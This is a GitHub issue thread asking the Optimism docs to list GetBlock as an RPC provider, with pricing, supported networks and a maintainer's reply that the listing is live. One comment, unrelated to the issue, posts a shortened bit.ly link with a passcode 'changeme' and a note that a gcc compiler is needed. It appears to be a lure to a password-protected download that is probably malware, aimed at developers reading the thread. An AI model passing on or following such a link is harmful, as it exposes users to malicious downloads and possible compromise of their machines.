### ISSUE TITLE
[RPC PROVIDER] Add PR title

### ISSUE THREAD

**Issue by JoGetBlock** [ethereum-optimism/docs#885]
### RPC Provider Name

GetBlock

### RPC Provider Description & Pricing

[GetBlock](https://getblock.io/nodes/op/) provides reliable access to full blockchain nodes via RPC, supporting multiple networks, including Optimism. It's ideal for developers building dApps, smart contracts, and blockchain projects, offering scalable and efficient infrastructure.
It offers a Pay-as-You-Go flexible pricing based on actual usage, perfect for unpredictable workloads that starts from $29 and also has a free plan for testing that includes 40K requests daily.

### RPC Provider URL

https://getblock.io/nodes/op/

### Supported Networks

- [X] OP Mainnet
- [ ] OP Goerli
- [X] OP Sepolia

### When did the product go live?

2019

### Is the product open source?

Yes

### Documentation URL

https://getblock.io/docs/

### Additional context

Getblock isn't is not displayed on this page https://docs.optimism.io/builders/tools/connect/rpc-providers, although it is also an active provider of Optimism

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by krofax** [comment]
This is done, and it's live
